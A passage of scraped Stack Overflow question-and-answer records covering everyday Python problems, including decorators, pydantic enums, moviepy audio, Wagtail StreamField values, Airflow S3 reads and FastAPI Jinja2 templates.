keyPress) \n\nwin.mainloop()\n\n"
] | [
0
] | [] | [] | [
"python",
"python_3.x",
"tkinter",
"tkinter_canvas"
] | stackoverflow_0074551500_python_python_3.x_tkinter_tkinter_canvas.txt |
Q:
Generate JSON object from json-path in python
I have a list of JSON paths and a value for every path, for example:
bla.[0].ble with a value: 3
and I would like to generate a JSON object where the output will look like this:
{
"bla": [
{
"ble": 3
}
]
}
To find expressions in the JSON I used the jsonpath-ng library, but now I want to go the other direction and build JSON from JSON paths.
Can you give me some advice on how to make this JSON generator, so it can be used for every JSON path?
I tried to just loop through the keys and create a list if needed, but maybe there is a more generic solution for this? (Any open-source library is also perfect if there is one.)
A:
As a workaround my solution was to build a new dictionary using the expressions (or their hash) as keys and the values as the values:
generated_json[hash(bla.[0].ble)] = 3
So even though the json object doesn't match the expected output format, I can use this to lookup my expressions as they describe unique paths.
Please feel free to suggest any better solution as this is just a workaround.
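For what it's worth, a more direct route is to parse each path into dict keys and list indices and create the containers as you walk. A minimal sketch, assuming the dotted bla.[0].ble syntax from the question (a real JSONPath grammar is much richer):
import re

def set_path(root, path, value):
    # Sketch: split 'bla.[0].ble' into ['bla', 0, 'ble']
    tokens = [int(t[1:-1]) if re.fullmatch(r"\[\d+\]", t) else t
              for t in path.split(".")]
    node = root
    for tok, nxt in zip(tokens, tokens[1:] + [None]):
        if isinstance(tok, int):
            while len(node) <= tok:        # pad the list up to the index
                node.append(None)
            if nxt is None:
                node[tok] = value
            else:
                if node[tok] is None:
                    node[tok] = [] if isinstance(nxt, int) else {}
                node = node[tok]
        else:
            if nxt is None:
                node[tok] = value
            else:
                node = node.setdefault(tok, [] if isinstance(nxt, int) else {})
    return root

print(set_path({}, "bla.[0].ble", 3))   # {'bla': [{'ble': 3}]}
Calling set_path repeatedly with the same root dict merges all paths into one object.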
| Generate JSON object from json-path in python | I have a list of json path-s and some values for every path, for example:
bla.[0].ble with a value: 3
and I would like to generate a json object where to output will look like this:
{
"bla": [
{
"ble": 3
}
]
}
To find the expression in the json I used jsonpath-ng library, but now I want to do the other direction, and build json from json-paths.
Can you give me some advice how make this json-generator, which can be used for every json-path?
I tried to just loop through the keys and create list if needed, but maybe there is a more generic solution for this? (any open source library is also perfect if there is any)
| [
"As a workaround my solution was to build a new dictionary using the expressions (or their hash) as keys and the values as the values:\ngenerated_json[hash(bla.[0].ble)] = 3\nSo even though the json object doesn't match the expected output format, I can use this to lookup my expressions as they describe unique paths.\nPlease feel free to suggest any better solution as this is just a workaround.\n"
] | [
0
] | [] | [] | [
"json",
"jsonpath",
"python"
] | stackoverflow_0074562160_json_jsonpath_python.txt |
Q:
Error occurring when I try to run decorator with @ - Python
I am having a problem with the following program.
When I try to run the decorator the easier way, using @ like this:
def decorator1(fun):
def wrapper():
text = '------'
return text + '\n' + fun + '\n' + text
return wrapper()
def decorator2(fun):
def wrapper():
return fun.upper()
return wrapper()
@decorator1
@decorator2
def function():
return "Hey ya!"
print(function())
The following problem occurs:
Traceback (most recent call last):
File "C:\Python_projects\main.py", line 17, in <module>
def function():
File "C:\Python_projects\main.py", line 13, in decorator2
return wrapper()
File "C:\Python_projects\main.py", line 11, in wrapper
return fun.upper()
AttributeError: 'function' object has no attribute 'upper'
or when I switch the order of the decorators, it goes like this:
Traceback (most recent call last):
File "C:\Python_projects\main.py", line 17, in <module>
def function():
File "C:\Python_projects\main.py", line 6, in decorator1
return wrapper()
File "C:\Python_projects\main.py", line 4, in wrapper
return text + '\n' + fun + '\n' + text
TypeError: can only concatenate str (not "function") to str
When I run the code this way, it works just fine:
def decorator1(fun):
def wrapper():
text = '------'
return text + '\n' + fun + '\n' + text
return wrapper()
def decorator2(fun):
def wrapper():
return fun.upper()
return wrapper()
def function():
return "Hey ya!"
print(decorator1(decorator2(function())))
But it seems like using @ with decorators is much more popular. Do you have any idea what I am doing wrong?
A:
First of all, a decorator is a function that accepts a function and returns a function. Thus, do not call the wrapper, but return it. Moreover, the wrapped fun must actually be called.
def decorator1(fun):
def wrapper():
text = "------"
return text + "\n" + fun() + "\n" + text
return wrapper
def decorator2(fun):
def wrapper():
return fun().upper()
return wrapper
@decorator1
@decorator2
def function():
return "Hey ya!"
print(function())
Note that those decorators will work only with functions (or callables in general) that return str and accept no arguments. Additionally, you can annotate the fun argument properly with Callable[[], str]:
from typing import Callable
def decorator1(fun: Callable[[], str]):
...
A:
A decorator is a function which is run on another function, as in a function object, not the result of another function.
So:
@decorator
def func():
...
Is equivalent to:
def func():
...
func = decorator(func)
Notice that the function func has never actually been called.
Therefore, within the wrapper function within the decorator, you actually need to call the function yourself. Use, for example, fun().upper(), not fun.upper().
Also, the wrapper function should never be called within the decorator; the function itself should be returned, so return wrapper not return wrapper().
Here is the corrected code:
def decorator1(fun):
def wrapper():
text = '------'
return text + '\n' + fun() + '\n' + text
return wrapper
def decorator2(fun):
def wrapper():
return fun().upper()
return wrapper
@decorator1
@decorator2
def function():
return "Hey ya!"
print(function())
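As a side note (not part of the original question), real-world decorators usually forward arguments and preserve the wrapped function's metadata with functools.wraps; a sketch of decorator2 in that style:
import functools

def decorator2(fun):
    @functools.wraps(fun)             # keeps fun.__name__, __doc__, etc.
    def wrapper(*args, **kwargs):     # forwards any arguments
        return fun(*args, **kwargs).upper()
    return wrapper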
| Error occuring when I try to run decorator with @ - Python | I am having a problem with the following programm.
When I try to run decorator the easier way, using @ like this
def decorator1(fun):
def wrapper():
text = '------'
return text + '\n' + fun + '\n' + text
return wrapper()
def decorator2(fun):
def wrapper():
return fun.upper()
return wrapper()
@decorator1
@decorator2
def function():
return "Hey ya!"
print(function())
Following problems occurs:
Traceback (most recent call last):
File "C:\Python_projects\main.py", line 17, in <module>
def function():
File "C:\Python_projects\main.py", line 13, in decorator2
return wrapper()
File "C:\Python_projects\main.py", line 11, in wrapper
return fun.upper()
AttributeError: 'function' object has no attribute 'upper'
or when I switch the order of decorators then it goes like this:
Traceback (most recent call last):
File "C:\Python_projects\main.py", line 17, in <module>
def function():
File "C:\Python_projects\main.py", line 6, in decorator1
return wrapper()
File "C:\Python_projects\main.py", line 4, in wrapper
return text + '\n' + fun + '\n' + text
TypeError: can only concatenate str (not "function") to str
When I run the code in this way, then it works just fine:
def decorator1(fun):
def wrapper():
text = '------'
return text + '\n' + fun + '\n' + text
return wrapper()
def decorator2(fun):
def wrapper():
return fun.upper()
return wrapper()
def function():
return "Hey ya!"
print(decorator(decorator2(function())))
But it seems like using @ with decorators is much more popular. Do you have any idea what I am doing wrong?
| [
"First of all, a decorator is a function that accepts a function and returns a function. Thus, do not call the wrapper, but return it. Moreover, the fun method should be called.\ndef decorator1(fun):\n def wrapper():\n text = \"------\"\n return text + \"\\n\" + fun() + \"\\n\" + text\n\n return wrapper\n\n\ndef decorator2(fun):\n def wrapper():\n return fun().upper()\n\n return wrapper\n\n\n@decorator1\n@decorator2\ndef function():\n return \"Hey ya!\"\n\n\nprint(function())\n\nNote that those decorators will work only with functions (or callables in general) that return str and accept no arguments. Additionally, you can annotate the fun argument properly with Callable[[], str]:\nfrom typing import Callable\n\n\ndef decorator1(fun: Callable[[], str]):\n ...\n\n",
"A decorator is a function which is run on another function, as in a function object, not the result of another function.\nSo:\n@decorator\ndef func():\n ...\n\nIs equivalent to:\ndef func():\n ...\nfunc = decorator(func)\n\nNotice that the function func has never actually been called.\nTherefore, within the wrapper function within the decorator, you actually need to call the function yourself. Use, for example, fun().upper(), not fun.upper().\nAlso, the wrapper function should never be called within the decorator; the function itself should be returned, so return wrapper not return wrapper().\nHere is the corrected code:\ndef decorator1(fun):\n def wrapper():\n text = '------'\n return text + '\\n' + fun() + '\\n' + text\n\n return wrapper\n\n\ndef decorator2(fun):\n def wrapper():\n return fun().upper()\n\n return wrapper\n\n@decorator1\n@decorator2\ndef function():\n return \"Hey ya!\"\n\n\nprint(function())\n\n"
] | [
0,
0
] | [] | [] | [
"decorator",
"python"
] | stackoverflow_0074603169_decorator_python.txt |
Q:
I want to insert an audio at a certain time on the video using moviepy.editor
I want to insert an audio track at a certain time in a video using moviepy.editor. How do I do it? Or do you have another way? Please show me.
An example of what I mean: (image omitted)
I was expecting someone to answer me, because I searched for a long time but couldn't find a solution.
A:
You could use this:
clip.set_audio(CompositeAudioClip([audioclip.set_start(3)]))
and start your audio wherever you want. Note that set_audio returns a new clip, so keep the returned value.
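Put together, a minimal sketch (the file names are placeholders):
from moviepy.editor import VideoFileClip, AudioFileClip, CompositeAudioClip

video = VideoFileClip("input.mp4")                # placeholder file names
audio = AudioFileClip("voice.mp3").set_start(3)   # audio begins at t=3 s

# Mix the delayed audio over the clip and keep the returned copy;
# trim the audio if it would run past the video's end
final = video.set_audio(CompositeAudioClip([audio]))
final.write_videofile("output.mp4")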
| I want to insert an audio at a certain time on the video using moviepy.editor | I want to insert an audio at a certain time on the video using moviepy.editor, how do I do it?, or do you have another way? please show me.
Examples like this:enter image description here
I was expecting someone to answer me, because I searched for a long time but couldn't.
| [
"you could use this :\nclip.set_audio(CompositeAudioClip([audioclip.set_start(3)]))\nand start your audio wherever you want\n"
] | [
0
] | [] | [] | [
"ffmpeg",
"moviepy",
"python"
] | stackoverflow_0074553269_ffmpeg_moviepy_python.txt |
Q:
Multiply list by all elements of the list except at it's own index
I'm trying to build a function that, given a list, will return a list of the elements multiplied together, excluding the element at the same index. For example, for the list [1,2,3,4] it would return [2*3*4, 1*3*4, 1*2*4, 1*2*3].
This is what I tried
import numpy as np
def my_function(ints):
products = np.ones(len(ints))
indices = range(0,len(ints))
for i in ints:
        if i != indices[i]:
products *=ints[i]
return products
I think my problem was that I assumed "i" would reference the indices rather than the values at those indices.
How can I create something that will reference the indices rather than the values?
Is there a better way to approach this?
A:
with numpy this is easy:
import numpy as np
def fun(input):
arr = np.array(input)
return arr.prod() / arr
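One caveat: the division trick breaks when the list contains a zero. A sketch that stays in numpy and handles zeros explicitly:
import numpy as np

def fun_zero_safe(values):
    arr = np.array(values)
    zeros = arr == 0
    nz_prod = arr[~zeros].prod()       # product of the non-zero entries
    if not zeros.any():
        return nz_prod / arr           # original division trick
    out = np.zeros(len(arr), dtype=float)
    if zeros.sum() == 1:               # only the zero's own slot is non-zero
        out[zeros] = nz_prod
    return out                         # two or more zeros -> everything is zero

print(fun_zero_safe([1, 2, 0, 4]))     # [0. 0. 8. 0.]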
A:
Taking from @interjay's comment:
from functools import reduce
from operator import mul
total = reduce(mul, ints)
multiplied = [total/y for y in ints]
A:
Solution with enumerate:
from functools import reduce

def my_function(ints):
    res = []
    for i, el in enumerate(ints):
        res.append(reduce(lambda x, y: x*y, ints[:i] + ints[i+1:]))
    return res

print(my_function([1,2,3,4]))
>>> [24, 12, 8, 6]
A:
with list comprehension
array_of_nums = np.random.rand(10)
[np.prod([i for x, i in enumerate(array_of_nums) if x != e]) for e, y in enumerate(array_of_nums)]
A:
without using division
import numpy as np
def remainingProduct(arr):
a = arr
list1 = []
n = len(arr)
for i in range(0, n):
b = a[0]
a.remove(a[0])
c = np.prod(a)
list1.append(c)
a.append(b)
return list1
# print(remainingProduct([3, 2, 1]))#[2, 3, 6].
A:
Here's an easy approach
def mul_numbers(nums):
new_arr = []
for i in range(len(nums)):
product = 1
for j in range(len(nums)):
if nums[i] != nums[j]:
product *= nums[j]
new_arr.append(product)
return new_arr
arr = [1, 2, 3, 4, 5]
result = mul_numbers(arr)
print(result)
>>> [120, 60, 40, 30, 24]
A:
Here's an approach using reduce:
from functools import reduce
from operator import mul
l = [1, 2, 2, 3, 4]
# Modified to work with lists that contain dupes thanks to the feedback in comments
print([reduce(mul, l[:i]+l[i+1:], 1) for i in range(len(l))])
>>> [48, 24, 24, 16, 12]
A:
The way to incorporate enumerate into your code is
import numpy as np
def intmult(ints):
products = np.ones(len(ints))
for i,j in enumerate(ints):
products *= ints[i]
for i,j in enumerate(products):
products[i] /= ints[i]
return products
Note that this doesn't cover the case where one of the elements is 0.
A:
without using any library
just don't forget to append to the new array in the outer loop, with proper indentation.
def f(arr):
new_arr = []
for i in arr: #loop first
p = 1
for j in arr:
if i!=j:
p = p*j
new_arr.append(p) #append for loop first
return new_arr
arr = [2, 3, 4,5]
f(arr)
it's a bit confusing but works [not recommended]
def f(arr):
n = len(arr)
left = [1]*n
right = [1]*n
product_array = []
# build left array
for i in range(1,n):
left[i] = left[i-1] * arr[i-1]
# build right array
for i in range(1,n):
right[i] = right[i-1] * arr[::-1] [i-1]
# build product arr from subarrays
for i in range(n):
product_array.append(left[i] * right[::-1][i])
return product_array
arr = [2, 3, 4,5]
f(arr)
| Multiply list by all elements of the list except at it's own index | I'm trying to build a function that given a list will return a list with the elements multiplied together, excluding the element that was at the same index. For example for the list [1,2,3,4] it would return [2*3*4,1*3*4,1*2*3].
This is what I tried
import numpy as np
def my_function(ints):
products = np.ones(len(ints))
indices = range(0,len(ints))
for i in ints:
if i != indices[i]
products *=ints[i]
return products
I think my problem was that I was thinking that "i" would be referencing the indices rather than values of those indices.
How can I create something that will reference the indices rather than the values
Is there a better way to approach this?
| [
"with numpy this is easy:\nimport numpy as np\ndef fun(input):\n arr = np.array(input)\n return arr.prod() / arr\n\n",
"Taking from @interjay's comment:\nfrom operator import mul\n\ntotal = reduce(mul, ints)\nmultiplied = [total/y for y in ints]\n\n",
"Solution with enumerate:\ndef my_function(ints):\n res = []\n for i, el in enumerate(ints):\n res.append(reduce(lambda x, y: x*y, ints[:i] + ints[i+1:]))\n return res\n\nprint my_function([1,2,3,4])\n>>> [24, 12, 8, 6]\n\n",
"with list comprehension\narray_of_nums = np.random.rand(10)\n[np.prod([i for x, i in enumerate(array_of_nums) if x != e]) for e, y in enumerate(array_of_nums)]\n\n",
"without using division\n import numpy as np\n \n def remainingProduct(arr):\n a = arr\n list1 = []\n n = len(arr)\n for i in range(0, n):\n b = a[0]\n a.remove(a[0])\n c = np.prod(a)\n list1.append(c)\n a.append(b)\n return list1\n \n # print(remainingProduct([3, 2, 1]))#[2, 3, 6].\n\n",
"Here's an easy approach\ndef mul_numbers(nums):\n new_arr = []\n for i in range(len(nums)):\n product = 1\n for j in range(len(nums)):\n if nums[i] != nums[j]:\n product *= nums[j]\n new_arr.append(product)\n\n return new_arr\n\n\narr = [1, 2, 3, 4, 5]\nresult = mul_numbers(arr)\nprint(result)\n\n>>> [120, 60, 40, 30, 24]\n\n",
"Here's an approach using reduce:\nfrom functools import reduce\nfrom operator import mul\n\nl = [1, 2, 2, 3, 4]\n# Modified to work with lists that contain dupes thanks to the feedback in comments\nprint [reduce(mul, l[:i]+l[i+1:], 1) for i in xrange(len(l))]\n>>> [48, 24, 24, 16, 12]\n\n",
"The way to incorporate enumerate into your code is \nimport numpy as np\ndef intmult(ints):\n products = np.ones(len(ints))\n for i,j in enumerate(ints):\n products *= ints[i]\n for i,j in enumerate(products):\n products[i] /= ints[i]\n return products\n\nNote that this doesn't cover the case where one of the elements is 0.\n",
"without using any library\njust dont forget to append new array for loop first with proper indentation.\ndef f(arr):\n new_arr = []\n for i in arr: #loop first\n p = 1\n for j in arr:\n if i!=j:\n p = p*j\n new_arr.append(p) #append for loop first\n return new_arr\narr = [2, 3, 4,5]\nf(arr)\n\nits bit confusing but works [not recommended]\ndef f(arr):\n n = len(arr)\n left = [1]*n\n right = [1]*n\n product_array = []\n\n # build left array\n for i in range(1,n):\n left[i] = left[i-1] * arr[i-1]\n # build right array\n for i in range(1,n):\n right[i] = right[i-1] * arr[::-1] [i-1]\n \n # build product arr from subarrays\n for i in range(n):\n product_array.append(left[i] * right[::-1][i])\n return product_array\n\narr = [2, 3, 4,5]\nf(arr)\n\n"
] | [
5,
3,
2,
1,
1,
1,
0,
0,
0
] | [] | [] | [
"list",
"numpy",
"python"
] | stackoverflow_0036288124_list_numpy_python.txt |
Q:
How to pass dynamic strings to pydantic fields
I have this code in my framework on Python 3.10 + Pydantic
class DataInclude(BaseModel):
currencyAccount: Literal["CNY счет", "AMD счет", "RUB счет", "USD счет", "EUR счет", "GBP счет", "CHF счет"]
I want to learn the right way to use dynamic parameters in a string:
name = (CNY, AMD, RUB, USD, EUR, GBP, CHF)
class DataInclude(BaseModel):
currencyAccount: Literal[f"{name}счет"]
I couldn't manage it with the help of regex either.
A:
As I mentioned in my comment already, you cannot dynamically specify a typing.Literal type.
Instead of doing that, you could just create your own enum.Enum to represent the valid currency options. Pydantic plays nicely with those. And the Enum functional API allows you to set it up dynamically.
from enum import Enum
from pydantic import BaseModel, ValidationError
CURRENCIES = (
"CNY",
"AMD",
"RUB",
"USD",
"EUR",
"GBP",
"CHF",
)
Currency = Enum(
"Currency",
((curr, f"{curr} счет") for curr in CURRENCIES),
type=str,
)
class Data(BaseModel):
currency: Currency
if __name__ == "__main__":
obj = Data(currency="CNY счет")
print(obj, "\n")
try:
Data(currency="foo")
except ValidationError as e:
print(e)
Output:
currency=<Currency.CNY: 'CNY счет'>
1 validation error for Data
currency
value is not a valid enumeration member ...
The drawback to the Enum functional API is that your average static type checker will not be able to infer any enumeration members. Thus, your IDE will probably not provide you with auto-suggestions, if you wanted to use a member like Currency.AMD for example. If that bothers you, consider using the regular class definition for that Currency enum.
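For reference, a sketch of that regular class definition with the same values spelled out by hand:
class Currency(str, Enum):
    CNY = "CNY счет"
    AMD = "AMD счет"
    RUB = "RUB счет"
    USD = "USD счет"
    EUR = "EUR счет"
    GBP = "GBP счет"
    CHF = "CHF счет"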
| How to pass dynamic strings to pydantic fields | I have this code in my framework on Python 3.10 + Pydantic
class DataInclude(BaseModel):
currencyAccount: Literal["CNY счет", "AMD счет", "RUB счет", "USD счет", "EUR счет", "GBP счет", "CHF счет"]
I want to learn how to do it right to use dynamic parameters in a string
name = (CNY, AMD, RUB, USD, EUR, GBP, CHF)
class DataInclude(BaseModel):
currencyAccount: Literal[f"{name}счет"]
With the help of regex I couldn't either
| [
"As I mentioned in my comment already, you cannot dynamically specify a typing.Literal type.\nInstead of doing that, you could just create your own enum.Enum to represent the valid currency options. Pydantic plays nicely with those. And the Enum functional API allows you to set it up dynamically.\nfrom enum import Enum\n\nfrom pydantic import BaseModel, ValidationError\n\n\nCURRENCIES = (\n \"CNY\",\n \"AMD\",\n \"RUB\",\n \"USD\",\n \"EUR\",\n \"GBP\",\n \"CHF\",\n)\n\nCurrency = Enum(\n \"Currency\",\n ((curr, f\"{curr} счет\") for curr in CURRENCIES),\n type=str,\n)\n\n\nclass Data(BaseModel):\n currency: Currency\n\n\nif __name__ == \"__main__\":\n obj = Data(currency=\"CNY счет\")\n print(obj, \"\\n\")\n try:\n Data(currency=\"foo\")\n except ValidationError as e:\n print(e)\n\nOutput:\ncurrency=<Currency.CNY: 'CNY счет'> \n\n1 validation error for Data\ncurrency\n value is not a valid enumeration member ...\n\nThe drawback to the Enum functional API is that your average static type checker will not be able to infer any enumeration members. Thus, your IDE will probably not provide you with auto-suggestions, if you wanted to use a member like Currency.AMD for example. If that bothers you, consider using the regular class definition for that Currency enum.\n"
] | [
2
] | [] | [] | [
"pydantic",
"python"
] | stackoverflow_0074602819_pydantic_python.txt |
Q:
Python imports: module not found from same level module
In the terminal
> python mod1/script1.py
>> ModuleNotFoundError: No module named 'mod2'
I have followed the guide about imports and numerous other Stack Overflow posts about this very basic problem, and I don't get why it's not working. Pylance is able to resolve the modules. - Using Python 3.10.7 64-bit.
Every module has __init__.py.
Directory structure as in screencap
root
-mod1
--script1.py
--__init__.py
-mod2
--script2.py
--__init__.py
A:
You want to import a module from a different directory, if I understand correctly?
Python will only look for files and modules in its current directory, and
you cannot refer to another directory simply by putting the folder name before the module name.
You must add the other directory's path using the sys module,
so Python will look for the module in that path when it doesn't exist in the current one.
# import the sys module
import sys
# enter the full direction of the package
sys.path.insert(0 , 'C:\\Users\\name\\desktop\\folder\\mod2')
# then import module
import script2 as lib
lib.call()
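A less brittle alternative than a hard-coded absolute path (a sketch, assuming the root/mod1/mod2 layout from the question) is to either run the script as a module from the project root — python -m mod1.script1 — or derive the root from the file's own location:
# mod1/script1.py -- sketch: put the project root on sys.path at runtime
import sys
from pathlib import Path

sys.path.insert(0, str(Path(__file__).resolve().parent.parent))  # .../root

from mod2 import script2  # resolvable now that root is on sys.path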
| Python imports: module not found from same level module |
In the terminal
> python mod1/script1.py
>> ModuleNotFoundError: No module named 'mod2'
I have followed the guide about imports and numerous other stack overflows about htis very basic problem, and I don't get why it's not working. Pylance is able to resolve the modules. - Using Python 3.10.7 64-bit.
Every module has __init__.py.
Directory structure as in screencap
root
-mod1
--script1.py
--__init__.py
-mod2
--script2.py
--__init__.py
| [
"you want to import a module from a different directory , am I understood correctly?\nso python will only look for the files & modules in its current directory and\nyou cannot refer to another directory simply by putting the folder name before the module name\n\nyou must import the path of a different directory , using sys module\nso python will look for the module in another path if it doesn't exist in the current path.\n# import the sys module\nimport sys\n# enter the full direction of the package \nsys.path.insert(0 , 'C:\\\\Users\\\\name\\\\desktop\\\\folder\\\\mod2')\n# then import module\nimport script2 as lib\nlib.call()\n\n\n\n"
] | [
0
] | [] | [] | [
"import",
"python"
] | stackoverflow_0074602687_import_python.txt |
Q:
Wagtail - How to set rich text value in nested block (StreamField->StructBlock->RichTextBlock)
I have the following structure:
class ParagraphWithRelatedLinkBlock(blocks.StructBlock):
    text = blocks.RichTextBlock()
    related_link = blocks.ListBlock(blocks.URLBlock())

class BlogPageSF(Page):
    body = StreamField(
        [
            ("paragraph", ParagraphWithRelatedLinkBlock()),
        ], use_json_field=True
    )
I want to set the value of the 'text' field from a script or the Django shell (not via the Wagtail admin site).
How can I do that?
I have tried to do the following in the shell:
p = BlogPageSF()
rt = RichTextBlock('Test')
pb = ParagraphWithRelatedLinkBlock()
pb.text = rt
p.body.append(('paragraph', pb))
p.save()
I expect the 'text' field in ParagraphWithRelatedLinkBlock to have the value 'Test',
but I get the error:
AttributeError: 'ParagraphWithRelatedLinkBlock' object has no attribute 'items'
A:
The values you insert into StreamField data should not be instances of the Block class - block instances are only used as part of the stream definition (for example, when you write text = blocks.RichTextBlock(), you're creating an instance of RichTextBlock that forms part of the ParagraphWithRelatedLinkBlock definition).
The correct data types are either simple Python values, such as dict for a StructBlock, or a dedicated value type such as wagtail.rich_text.RichText for a RichTextBlock. So, in the case of ParagraphWithRelatedLinkBlock, you need to supply a dict containing a RichText value:
from wagtail.rich_text import RichText
p = BlogPageSF()
p.body.append(('paragraph', {'text': RichText('Test')}))
p.save()
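If you also want to fill the related_link ListBlock from the question's StructBlock, it should take a plain list of URL strings (a sketch extending the snippet above; verify against your Wagtail version):
p.body.append(('paragraph', {
    'text': RichText('Test'),
    'related_link': ['https://example.com'],  # ListBlock of URLBlock -> plain list of strings
}))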
| Wagtail - How to set rich text value in nested block (StreamField->StructBlock->RichTextBlock) | I have the following structure:
`class ParagraphWithRelatedLinkBlock(blocks.StructBlock):
text = blocks.RichTextBlock()
related_link = blocks.ListBlock(blocks.URLBlock())
class BlogPageSF(Page):
body = StreamField(
[
("paragraph", ParagraphWithRelatedLinkBlock(),
], use_json_field=True
)`
I want to set value of 'text' field from script or Django shell (not via the Wagtail admin site).
How can I do that?
I have tried to do the following in shell:
`p = BlogPageSF()
rt = RichTextBlock('Test')
pb = ParagraphWithRelatedLinkBlock()
pb.text = rt
p.body.append(('paragraph', pb))
p.save()`
I expect that 'text' field in ParagraphWithRelatedLinkBlock will have value of 'Test'
But I get error:
AttributeError: 'ParagraphWithRelatedLinkBlock' object has no attribute 'items'
| [
"The values you insert into StreamField data should not be instances of the Block class - block instances are only used as part of the stream definition (for example, when you write text = blocks.RichTextBlock(), you're creating an instance of RichTextBlock that forms part of the ParagraphWithRelatedLinkBlock definition).\nThe correct data types are either simple Python values, such as dict for a StructBlock, or a dedicated value type such as wagtail.rich_text.RichText for a RichTextBlock. So, in the case of ParagraphWithRelatedLinkBlock, you need to supply a dict containing a RichText value:\nfrom wagtail.rich_text import RichText\n\np = BlogPageSF()\np.body.append(('paragraph', {'text': RichText('Test')}))\np.save()\n\n"
] | [
0
] | [] | [] | [
"django",
"python",
"wagtail"
] | stackoverflow_0074601679_django_python_wagtail.txt |
Q:
Python::Not reading data correctly from the file in S3
Requirement: To read data from S3 to pass into API
Error: "error": {"code": "ModelStateInvalid", "message": "The request has exceeded the maximum number of validation errors.", "target": "HttpRequest"
When I pass the data directly in the code as the document below, it works fine:
def create_doc(self,client):
self.n_docs = int(self.n_docs)
document = {'addresses': {'SingleLocation': {'city': 'ABC',
'country': 'US',
'line1': 'Main',
'postalCode': '00000',
'region': 'CA'
}
},
'commit': False,
}
response = client.cr_transc(document)
jsn = response.json()
But when I tried putting the data in a file in S3 and reading it from S3, it throws the error:
def create_doc(self,client):
self.n_docs = int(self.n_docs)
document = data_from_s3()
response = client.cr_transc(document)
jsn = response.json()
def data_from_s3(self):
s3 = S3Hook()
data = s3.read_key(bucket_name = self.bucket_name, key = self.data_key)
return data
The link below is for the read_key method in Airflow:
https://airflow.apache.org/docs/apache-airflow/1.10.6/_modules/airflow/hooks/S3_hook.html#S3Hook:~:text=%5Bdocs%5D%20%20%20%20def-,read_key,-(self%2C
A:
Checking the source code:
def read_key(self, key, bucket_name=None):
"""
Reads a key from S3
:param key: S3 key that will point to the file
:type key: str
:param bucket_name: Name of the bucket in which the file is stored
:type bucket_name: str
"""
obj = self.get_key(key, bucket_name)
return obj.get()['Body'].read().decode('utf-8')
This returns a str. You might need to use the json module to convert it:
import json
def create_doc(self,client):
self.n_docs = int(self.n_docs)
document = json.loads(data_from_s3()) # <----- convert here
response = client.cr_transc(document)
jsn = response.json()
def data_from_s3(self):
s3 = S3Hook()
data = s3.read_key(bucket_name = self.bucket_name, key = self.data_key)
return data
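If the S3 object may occasionally hold malformed JSON, a small guard (just a sketch on top of the same hook) fails fast with a clear message instead of sending a bad payload to the API:
import json

def document_from_s3(self):
    raw = self.data_from_s3()
    try:
        return json.loads(raw)
    except json.JSONDecodeError as exc:
        # Fail fast with context instead of a vague API validation error
        raise ValueError(f"S3 key {self.data_key} is not valid JSON: {exc}") from exc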
| Python::Not reading data correctly from the file in S3 | Requirement: To read data from S3 to pass into API
Error: "error": {"code": "ModelStateInvalid", "message": "The request has exceeded the maximum number of validation errors.", "target": "HttpRequest"
When I pass data directly in the code as below document , it works fine as below
def create_doc(self,client):
self.n_docs = int(self.n_docs)
document = {'addresses': {'SingleLocation': {'city': 'ABC',
'country': 'US',
'line1': 'Main',
'postalCode': '00000',
'region': 'CA'
}
},
'commit': False,
}
response = client.cr_transc(document)
jsn = response.json()
But when tried having data in the file in the s3 and read it from s3 , it throws into error
def create_doc(self,client):
self.n_docs = int(self.n_docs)
document = data_from_s3()
response = client.cr_transc(document)
jsn = response.json()
def data_from_s3(self):
s3 = S3Hook()
data = s3.read_key(bucket_name = self.bucket_name, key = self.data_key)
return data
Below link is for read_key method in airflow
https://airflow.apache.org/docs/apache-airflow/1.10.6/_modules/airflow/hooks/S3_hook.html#S3Hook:~:text=%5Bdocs%5D%20%20%20%20def-,read_key,-(self%2C
| [
"Checking the source code:\ndef read_key(self, key, bucket_name=None):\n \"\"\"\n Reads a key from S3\n\n :param key: S3 key that will point to the file\n :type key: str\n :param bucket_name: Name of the bucket in which the file is stored\n :type bucket_name: str\n \"\"\"\n\n obj = self.get_key(key, bucket_name)\n return obj.get()['Body'].read().decode('utf-8')\n\n\nThis returns a str. You might need to use the json module to convert it:\nimport json\n\n\ndef create_doc(self,client):\n self.n_docs = int(self.n_docs)\n document = json.loads(data_from_s3()) # <----- convert here\n response = client.cr_transc(document) \n jsn = response.json()\n\ndef data_from_s3(self):\n s3 = S3Hook()\n data = s3.read_key(bucket_name = self.bucket_name, key = self.data_key)\n return data\n\n"
] | [
0
] | [] | [] | [
"python",
"python_3.x"
] | stackoverflow_0074603235_python_python_3.x.txt |
Q:
How to pass Python's time function to Jinja2 template using FastAPI?
I send a time.time() variable t0 to my template from FastAPI, which is the time the update was triggered:
return templates.TemplateResponse("jobs.html", {
"request": request, "jobs": sorted(out, key=lambda d: d['id'], reverse=True),
"project_ids": ','.join([str(id) for id in myids]),
"sorted_collumn": 'id',
"filter": filter,
"alljobs":alljobs,
"nrecent": nrecent,
"t0": t0
})
How can I time it at the end of rendering, i.e.:
f"processtime:{time.time()-t0:.2f}sec"
time: {{ import time; time.time()-t0 }}
jinja2.exceptions.TemplateSyntaxError: expected token 'end of print statement', got 'time'
or
time: {{ time.time()-t0 }}
jinja2.exceptions.UndefinedError: 'float object' has no attribute 'time'
A:
Looking at the source code of Starlette (i.e., starlette/templating.py),
you can see the following line:
env.globals["url_for"] = url_for
So adding the line:
templates.env.globals["now"] = time.time
before the return statement above fixes it; then add the below to the jobs.html template:
time: {{ "{0:0.2f}".format(now()-t0) }} sec
time: 16.01 sec
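Put together, a minimal sketch of the whole setup (the directory and route names are assumptions):
import time

from fastapi import FastAPI, Request
from fastapi.templating import Jinja2Templates

app = FastAPI()
templates = Jinja2Templates(directory="templates")  # assumed template directory
templates.env.globals["now"] = time.time            # expose time.time() to all templates

@app.get("/jobs")
def jobs(request: Request):
    return templates.TemplateResponse(
        "jobs.html", {"request": request, "t0": time.time()}
    )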
| How to pass Python's time function to Jinja2 template using FastAPI? | I send a time.time() variable t0 to my template from FastAPI, which is the time update was triggered:
return templates.TemplateResponse("jobs.html", {
"request": request, "jobs": sorted(out, key=lambda d: d['id'], reverse=True),
"project_ids": ','.join([str(id) for id in myids]),
"sorted_collumn": 'id',
"filter": filter,
"alljobs":alljobs,
"nrecent": nrecent,
"t0": t0
})
How can I time it at the end of rendering aka:
f"processtime:{time.time()-t0:.2f}sec"
time: {{ import time; time.time()-t0 }}
jinja2.exceptions.TemplateSyntaxError: expected token 'end of print statement', got 'time'
or
time: {{ time.time()-t0 }}
